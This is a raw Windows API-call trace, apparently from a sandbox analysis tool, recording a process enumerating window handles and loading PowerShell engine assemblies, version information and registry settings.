	[0399.449] GetWindowThreadProcessId (in: hWnd=0x102e0, lpdwProcessId=0x18de00 | out: lpdwProcessId=0x18de00) returned 0x24c
	[0399.449] GetWindowThreadProcessId (in: hWnd=0x102dc, lpdwProcessId=0x18de00 | out: lpdwProcessId=0x18de00) returned 0xbb0
	[0399.449] GetWindowThreadProcessId (in: hWnd=0x102d2, lpdwProcessId=0x18de00 | out: lpdwProcessId=0x18de00) returned 0xbfc
	[0399.449] GetWindowThreadProcessId (in: hWnd=0x102ce, lpdwProcessId=0x18de00 | out: lpdwProcessId=0x18de00) returned 0xb10
	[0399.449] GetWindowThreadProcessId (in: hWnd=0x102ca, lpdwProcessId=0x18de00 | out: lpdwProcessId=0x18de00) returned 0x374
	[0399.449] GetWindowThreadProcessId (in: hWnd=0x102c6, lpdwProcessId=0x18de00 | out: lpdwProcessId=0x18de00) returned 0x368
	[0399.449] GetWindowThreadProcessId (in: hWnd=0x102c2, lpdwProcessId=0x18de00 | out: lpdwProcessId=0x18de00) returned 0xb28
	[0399.449] GetWindowThreadProcessId (in: hWnd=0x102be, lpdwProcessId=0x18de00 | out: lpdwProcessId=0x18de00) returned 0xae8
	[0399.449] GetWindowThreadProcessId (in: hWnd=0x102b2, lpdwProcessId=0x18de00 | out: lpdwProcessId=0x18de00) returned 0xb14
	[0399.449] GetWindowThreadProcessId (in: hWnd=0x102ae, lpdwProcessId=0x18de00 | out: lpdwProcessId=0x18de00) returned 0x95c
	[0399.449] GetWindowThreadProcessId (in: hWnd=0x102aa, lpdwProcessId=0x18de00 | out: lpdwProcessId=0x18de00) returned 0xa8c
	[0399.450] GetWindowThreadProcessId (in: hWnd=0x202a0, lpdwProcessId=0x18de00 | out: lpdwProcessId=0x18de00) returned 0x46c
	[0399.450] GetWindowThreadProcessId (in: hWnd=0x10264, lpdwProcessId=0x18de00 | out: lpdwProcessId=0x18de00) returned 0xb3c
	[0399.450] GetWindowThreadProcessId (in: hWnd=0x10254, lpdwProcessId=0x18de00 | out: lpdwProcessId=0x18de00) returned 0xa90
	[0399.450] GetWindowThreadProcessId (in: hWnd=0x10244, lpdwProcessId=0x18de00 | out: lpdwProcessId=0x18de00) returned 0xad0
	[0399.450] GetWindowThreadProcessId (in: hWnd=0x1022a, lpdwProcessId=0x18de00 | out: lpdwProcessId=0x18de00) returned 0xa9c
	[0399.450] GetWindowThreadProcessId (in: hWnd=0x10226, lpdwProcessId=0x18de00 | out: lpdwProcessId=0x18de00) returned 0xaa0
	[0399.450] GetWindowThreadProcessId (in: hWnd=0x10222, lpdwProcessId=0x18de00 | out: lpdwProcessId=0x18de00) returned 0xb1c
	[0399.450] GetWindowThreadProcessId (in: hWnd=0x1021e, lpdwProcessId=0x18de00 | out: lpdwProcessId=0x18de00) returned 0x7e0
	[0399.450] GetWindowThreadProcessId (in: hWnd=0x10216, lpdwProcessId=0x18de00 | out: lpdwProcessId=0x18de00) returned 0xa74
	[0399.450] GetWindowThreadProcessId (in: hWnd=0x20208, lpdwProcessId=0x18de00 | out: lpdwProcessId=0x18de00) returned 0x694
	[0399.450] GetWindowThreadProcessId (in: hWnd=0x401f0, lpdwProcessId=0x18de00 | out: lpdwProcessId=0x18de00) returned 0xa28
	[0399.450] GetWindowThreadProcessId (in: hWnd=0x1020c, lpdwProcessId=0x18de00 | out: lpdwProcessId=0x18de00) returned 0x9b0
	[0399.451] GetWindowThreadProcessId (in: hWnd=0x10202, lpdwProcessId=0x18de00 | out: lpdwProcessId=0x18de00) returned 0x8d8
	[0399.451] GetWindowThreadProcessId (in: hWnd=0x201ca, lpdwProcessId=0x18de00 | out: lpdwProcessId=0x18de00) returned 0x940
	[0399.451] GetWindowThreadProcessId (in: hWnd=0x201d8, lpdwProcessId=0x18de00 | out: lpdwProcessId=0x18de00) returned 0x93c
	[0399.451] GetWindowThreadProcessId (in: hWnd=0x301e2, lpdwProcessId=0x18de00 | out: lpdwProcessId=0x18de00) returned 0x4ec
	[0399.451] GetWindowThreadProcessId (in: hWnd=0x201de, lpdwProcessId=0x18de00 | out: lpdwProcessId=0x18de00) returned 0x150
	[0399.451] GetWindowThreadProcessId (in: hWnd=0x201c8, lpdwProcessId=0x18de00 | out: lpdwProcessId=0x18de00) returned 0x720
	[0399.451] GetWindowThreadProcessId (in: hWnd=0x301f4, lpdwProcessId=0x18de00 | out: lpdwProcessId=0x18de00) returned 0x3c4
	[0399.451] GetWindowThreadProcessId (in: hWnd=0x301c0, lpdwProcessId=0x18de00 | out: lpdwProcessId=0x18de00) returned 0x7d4
	[0399.451] GetWindowThreadProcessId (in: hWnd=0x301c4, lpdwProcessId=0x18de00 | out: lpdwProcessId=0x18de00) returned 0x6c8
	[0399.451] GetWindowThreadProcessId (in: hWnd=0x4011e, lpdwProcessId=0x18de00 | out: lpdwProcessId=0x18de00) returned 0xb54
	[0399.451] GetWindowThreadProcessId (in: hWnd=0x50122, lpdwProcessId=0x18de00 | out: lpdwProcessId=0x18de00) returned 0xb54
	[0399.451] GetWindowThreadProcessId (in: hWnd=0x501b8, lpdwProcessId=0x18de00 | out: lpdwProcessId=0x18de00) returned 0xb5c
	[0399.452] GetWindowThreadProcessId (in: hWnd=0x101b2, lpdwProcessId=0x18de00 | out: lpdwProcessId=0x18de00) returned 0x838
	[0399.452] GetWindowThreadProcessId (in: hWnd=0x101ae, lpdwProcessId=0x18de00 | out: lpdwProcessId=0x18de00) returned 0x818
	[0399.452] GetWindowThreadProcessId (in: hWnd=0x101aa, lpdwProcessId=0x18de00 | out: lpdwProcessId=0x18de00) returned 0x5b8
	[0399.452] GetWindowThreadProcessId (in: hWnd=0x101a6, lpdwProcessId=0x18de00 | out: lpdwProcessId=0x18de00) returned 0x494
	[0399.452] GetWindowThreadProcessId (in: hWnd=0x101a2, lpdwProcessId=0x18de00 | out: lpdwProcessId=0x18de00) returned 0x1ec
	[0399.452] GetWindowThreadProcessId (in: hWnd=0x1019e, lpdwProcessId=0x18de00 | out: lpdwProcessId=0x18de00) returned 0x440
	[0399.452] GetWindowThreadProcessId (in: hWnd=0x1019a, lpdwProcessId=0x18de00 | out: lpdwProcessId=0x18de00) returned 0x7e8
	[0399.452] GetWindowThreadProcessId (in: hWnd=0x10196, lpdwProcessId=0x18de00 | out: lpdwProcessId=0x18de00) returned 0x730
	[0399.452] GetWindowThreadProcessId (in: hWnd=0x10192, lpdwProcessId=0x18de00 | out: lpdwProcessId=0x18de00) returned 0x2c8
	[0399.452] GetWindowThreadProcessId (in: hWnd=0x1018e, lpdwProcessId=0x18de00 | out: lpdwProcessId=0x18de00) returned 0x31c
	[0399.452] GetWindowThreadProcessId (in: hWnd=0x1018a, lpdwProcessId=0x18de00 | out: lpdwProcessId=0x18de00) returned 0x330
	[0399.452] GetWindowThreadProcessId (in: hWnd=0x10186, lpdwProcessId=0x18de00 | out: lpdwProcessId=0x18de00) returned 0x128
	[0399.452] GetWindowThreadProcessId (in: hWnd=0x10182, lpdwProcessId=0x18de00 | out: lpdwProcessId=0x18de00) returned 0x5c8
	[0399.453] GetWindowThreadProcessId (in: hWnd=0x1017e, lpdwProcessId=0x18de00 | out: lpdwProcessId=0x18de00) returned 0x6f8
	[0399.453] GetWindowThreadProcessId (in: hWnd=0x1017a, lpdwProcessId=0x18de00 | out: lpdwProcessId=0x18de00) returned 0x358
	[0399.453] GetWindowThreadProcessId (in: hWnd=0x10176, lpdwProcessId=0x18de00 | out: lpdwProcessId=0x18de00) returned 0x73c
	[0399.453] GetWindowThreadProcessId (in: hWnd=0x10172, lpdwProcessId=0x18de00 | out: lpdwProcessId=0x18de00) returned 0xb0
	[0399.453] GetWindowThreadProcessId (in: hWnd=0x1016e, lpdwProcessId=0x18de00 | out: lpdwProcessId=0x18de00) returned 0x250
	[0399.453] GetWindowThreadProcessId (in: hWnd=0x1016a, lpdwProcessId=0x18de00 | out: lpdwProcessId=0x18de00) returned 0x240
	[0399.453] GetWindowThreadProcessId (in: hWnd=0x20160, lpdwProcessId=0x18de00 | out: lpdwProcessId=0x18de00) returned 0x790
	[0399.453] GetWindowThreadProcessId (in: hWnd=0x70110, lpdwProcessId=0x18de00 | out: lpdwProcessId=0x18de00) returned 0x61c
	[0399.453] GetWindowThreadProcessId (in: hWnd=0x1013a, lpdwProcessId=0x18de00 | out: lpdwProcessId=0x18de00) returned 0x568
	[0399.453] GetWindowThreadProcessId (in: hWnd=0x10132, lpdwProcessId=0x18de00 | out: lpdwProcessId=0x18de00) returned 0x538
	[0399.453] GetWindowThreadProcessId (in: hWnd=0x10128, lpdwProcessId=0x18de00 | out: lpdwProcessId=0x18de00) returned 0x540
	[0399.453] GetWindowThreadProcessId (in: hWnd=0x20104, lpdwProcessId=0x18de00 | out: lpdwProcessId=0x18de00) returned 0x460
	[0399.454] GetWindowThreadProcessId (in: hWnd=0x2002a, lpdwProcessId=0x18de00 | out: lpdwProcessId=0x18de00) returned 0x79c
	[0399.454] GetWindowThreadProcessId (in: hWnd=0x1005a, lpdwProcessId=0x18de00 | out: lpdwProcessId=0x18de00) returned 0x4e0
	[0399.454] GetWindowThreadProcessId (in: hWnd=0x10048, lpdwProcessId=0x18de00 | out: lpdwProcessId=0x18de00) returned 0x460
	[0399.454] GetWindowThreadProcessId (in: hWnd=0x2001a, lpdwProcessId=0x18de00 | out: lpdwProcessId=0x18de00) returned 0x778
	[0399.783] WerSetFlags () returned 0x0
	[0399.791] SetThreadPreferredUILanguages (in: dwFlags=0x100, pwszLanguagesBuffer=0x0, pulNumLanguages=0x0 | out: pulNumLanguages=0x0) returned 1
	[0399.791] CoTaskMemFree (pv=0x0) 
	[0399.792] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x18e168, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x18e160 | out: pulNumLanguages=0x18e168, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x18e160) returned 1
	[0399.792] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x18e168, pwszLanguagesBuffer=0x2cb85a8, pcchLanguagesBuffer=0x18e160 | out: pulNumLanguages=0x18e168, pwszLanguagesBuffer=0x2cb85a8, pcchLanguagesBuffer=0x18e160) returned 1
	[0399.798] CoTaskMemAlloc (cb=0x24) returned 0x28fdb0
	[0399.798] GetUserDefaultLocaleName (in: lpLocaleName=0x28fdb0, cchLocaleName=16 | out: lpLocaleName="en-US") returned 6
	[0399.799] CoTaskMemFree (pv=0x28fdb0) 
	[0400.369] CoTaskMemAlloc (cb=0x104) returned 0x290510
	[0400.369] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x290510, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0400.369] CoTaskMemFree (pv=0x290510) 
	[0400.371] CoTaskMemAlloc (cb=0x104) returned 0x290510
	[0400.371] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x290510, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0400.371] CoTaskMemFree (pv=0x290510) 
	[0400.373] CoTaskMemAlloc (cb=0x104) returned 0x290510
	[0400.373] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x290510, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0400.373] CoTaskMemFree (pv=0x290510) 
	[0400.414] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18db30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0400.415] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18dbd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0400.415] SetErrorMode (uMode=0x1) returned 0x1
	[0400.415] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0x18dde0 | out: lpFileInformation=0x18dde0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1
	[0400.415] SetErrorMode (uMode=0x1) returned 0x1
	[0400.415] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0x18e050 | out: lpdwHandle=0x18e050) returned 0x94c
	[0400.416] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2cbbe38 | out: lpData=0x2cbbe38) returned 1
	[0400.417] VerQueryValueW (in: pBlock=0x2cbbe38, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x18dfc8, puLen=0x18dfc0 | out: lplpBuffer=0x18dfc8*=0x2cbbed4, puLen=0x18dfc0) returned 1
	[0400.417] VerQueryValueW (in: pBlock=0x2cbbe38, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0x18df38, puLen=0x18df30 | out: lplpBuffer=0x18df38*=0x2cbbfb0, puLen=0x18df30) returned 1
	[0400.418] lstrlenW (lpString="Microsoft Corporation") returned 21
	[0400.418] CoTaskMemAlloc (cb=0x2e) returned 0x1f95e0
	[0400.418] lstrcpyW (in: lpString1=0x1f95e0, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation"
	[0400.418] CoTaskMemFree (pv=0x1f95e0) 
	[0400.418] VerQueryValueW (in: pBlock=0x2cbbe38, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0x18df38, puLen=0x18df30 | out: lplpBuffer=0x18df38*=0x2cbc004, puLen=0x18df30) returned 1
	[0400.418] lstrlenW (lpString="System.Management.Automation") returned 28
	[0400.418] CoTaskMemAlloc (cb=0x3c) returned 0x29b120
	[0400.418] lstrcpyW (in: lpString1=0x29b120, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation"
	[0400.418] CoTaskMemFree (pv=0x29b120) 
	[0400.418] VerQueryValueW (in: pBlock=0x2cbbe38, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0x18df38, puLen=0x18df30 | out: lplpBuffer=0x18df38*=0x2cbc060, puLen=0x18df30) returned 1
	[0400.418] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0400.418] CoTaskMemAlloc (cb=0x20) returned 0x297ed0
	[0400.418] lstrcpyW (in: lpString1=0x297ed0, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0400.418] CoTaskMemFree (pv=0x297ed0) 
	[0400.418] VerQueryValueW (in: pBlock=0x2cbbe38, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0x18df38, puLen=0x18df30 | out: lplpBuffer=0x18df38*=0x2cbc0a0, puLen=0x18df30) returned 1
	[0400.418] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0400.418] CoTaskMemAlloc (cb=0x44) returned 0x29b120
	[0400.418] lstrcpyW (in: lpString1=0x29b120, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0400.418] CoTaskMemFree (pv=0x29b120) 
	[0400.418] VerQueryValueW (in: pBlock=0x2cbbe38, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0x18df38, puLen=0x18df30 | out: lplpBuffer=0x18df38*=0x2cbc108, puLen=0x18df30) returned 1
	[0400.418] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57
	[0400.418] CoTaskMemAlloc (cb=0x76) returned 0x234ad0
	[0400.418] lstrcpyW (in: lpString1=0x234ad0, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved."
	[0400.418] CoTaskMemFree (pv=0x234ad0) 
	[0400.418] VerQueryValueW (in: pBlock=0x2cbbe38, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0x18df38, puLen=0x18df30 | out: lplpBuffer=0x18df38*=0x2cbc1a4, puLen=0x18df30) returned 1
	[0400.418] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0400.418] CoTaskMemAlloc (cb=0x44) returned 0x29b120
	[0400.418] lstrcpyW (in: lpString1=0x29b120, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0400.418] CoTaskMemFree (pv=0x29b120) 
	[0400.418] VerQueryValueW (in: pBlock=0x2cbbe38, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0x18df38, puLen=0x18df30 | out: lplpBuffer=0x18df38*=0x2cbc208, puLen=0x18df30) returned 1
	[0400.419] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42
	[0400.419] CoTaskMemAlloc (cb=0x58) returned 0x1e5120
	[0400.419] lstrcpyW (in: lpString1=0x1e5120, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System"
	[0400.419] CoTaskMemFree (pv=0x1e5120) 
	[0400.419] VerQueryValueW (in: pBlock=0x2cbbe38, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0x18df38, puLen=0x18df30 | out: lplpBuffer=0x18df38*=0x2cbc284, puLen=0x18df30) returned 1
	[0400.419] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0400.419] CoTaskMemAlloc (cb=0x20) returned 0x297ed0
	[0400.419] lstrcpyW (in: lpString1=0x297ed0, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0400.419] CoTaskMemFree (pv=0x297ed0) 
	[0400.419] VerQueryValueW (in: pBlock=0x2cbbe38, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0x18df38, puLen=0x18df30 | out: lplpBuffer=0x18df38*=0x2cbbf2c, puLen=0x18df30) returned 1
	[0400.419] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49
	[0400.419] CoTaskMemAlloc (cb=0x66) returned 0x297100
	[0400.419] lstrcpyW (in: lpString1=0x297100, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly"
	[0400.419] CoTaskMemFree (pv=0x297100) 
	[0400.419] VerQueryValueW (in: pBlock=0x2cbbe38, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0x18df38, puLen=0x18df30 | out: lplpBuffer=0x18df38*=0x0, puLen=0x18df30) returned 0
	[0400.419] VerQueryValueW (in: pBlock=0x2cbbe38, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0x18df38, puLen=0x18df30 | out: lplpBuffer=0x18df38*=0x0, puLen=0x18df30) returned 0
	[0400.419] VerQueryValueW (in: pBlock=0x2cbbe38, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0x18df38, puLen=0x18df30 | out: lplpBuffer=0x18df38*=0x0, puLen=0x18df30) returned 0
	[0400.419] VerQueryValueW (in: pBlock=0x2cbbe38, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x18df08, puLen=0x18df00 | out: lplpBuffer=0x18df08*=0x2cbbed4, puLen=0x18df00) returned 1
	[0400.419] CoTaskMemAlloc (cb=0x204) returned 0x22c760
	[0400.419] VerLanguageNameW (in: wLang=0x0, szLang=0x22c760, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10
	[0400.419] CoTaskMemFree (pv=0x22c760) 
	[0400.419] VerQueryValueW (in: pBlock=0x2cbbe38, lpSubBlock="\\", lplpBuffer=0x18df58, puLen=0x18df50 | out: lplpBuffer=0x18df58*=0x2cbbe60, puLen=0x18df50) returned 1
	[0400.428] CoTaskMemAlloc (cb=0x104) returned 0x290510
	[0400.428] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x290510, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0400.428] CoTaskMemFree (pv=0x290510) 
	[0400.433] CoTaskMemAlloc (cb=0x104) returned 0x290510
	[0400.433] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x290510, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0400.433] CoTaskMemFree (pv=0x290510) 
	[0400.437] lstrlenW (lpString="䅁") returned 1
	[0400.839] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x18de28 | out: phkResult=0x18de28*=0x2f8) returned 0x0
	[0400.841] RegOpenKeyExW (in: hKey=0x2f8, lpSubKey="1", ulOptions=0x0, samDesired=0x20019, phkResult=0x18de18 | out: phkResult=0x18de18*=0x2fc) returned 0x0
	[0400.841] RegOpenKeyExW (in: hKey=0x2fc, lpSubKey="PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x18dea8 | out: phkResult=0x18dea8*=0x300) returned 0x0
	[0400.846] RegQueryValueExW (in: hKey=0x300, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x18ddec, lpData=0x0, lpcbData=0x18dde8*=0x0 | out: lpType=0x18ddec*=0x1, lpData=0x0, lpcbData=0x18dde8*=0x56) returned 0x0
	[0400.847] CoTaskMemAlloc (cb=0x5a) returned 0x297090
	[0400.847] RegQueryValueExW (in: hKey=0x300, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x18ddbc, lpData=0x297090, lpcbData=0x18ddb8*=0x56 | out: lpType=0x18ddbc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x18ddb8*=0x56) returned 0x0
	[0400.847] CoTaskMemFree (pv=0x297090) 
	[0400.853] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18d940, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0400.856] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18d940, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0400.863] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18d940, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.247] CoTaskMemAlloc (cb=0x104) returned 0x290510
	[0401.247] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x290510, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0401.247] CoTaskMemFree (pv=0x290510) 
	[0403.114] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x18d9e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0403.114] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x18d9e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0403.566] CoTaskMemAlloc (cb=0x104) returned 0x290620
	[0403.566] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x290620, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0403.566] CoTaskMemFree (pv=0x290620) 
	[0403.567] CoTaskMemAlloc (cb=0x104) returned 0x290620
	[0403.567] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x290620, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0403.567] CoTaskMemFree (pv=0x290620) 
	[0404.050] CoTaskMemAlloc (cb=0x104) returned 0x290620
	[0404.050] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x290620, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0404.050] CoTaskMemFree (pv=0x290620) 
	[0404.052] CoTaskMemAlloc (cb=0x104) returned 0x290620
	[0404.052] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x290620, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0404.052] CoTaskMemFree (pv=0x290620) 
	[0404.052] CoTaskMemAlloc (cb=0x104) returned 0x290620
	[0404.052] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x290620, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0404.053] CoTaskMemFree (pv=0x290620) 
	[0405.347] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x18d9e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0405.347] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x18d9e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0405.370] CoTaskMemAlloc (cb=0x104) returned 0x290620
	[0405.370] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x290620, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0405.370] CoTaskMemFree (pv=0x290620) 
	[0405.373] CoTaskMemAlloc (cb=0x104) returned 0x290620
	[0405.373] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x290620, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0405.373] CoTaskMemFree (pv=0x290620) 
	[0406.187] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18d9e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0406.187] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18d9e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
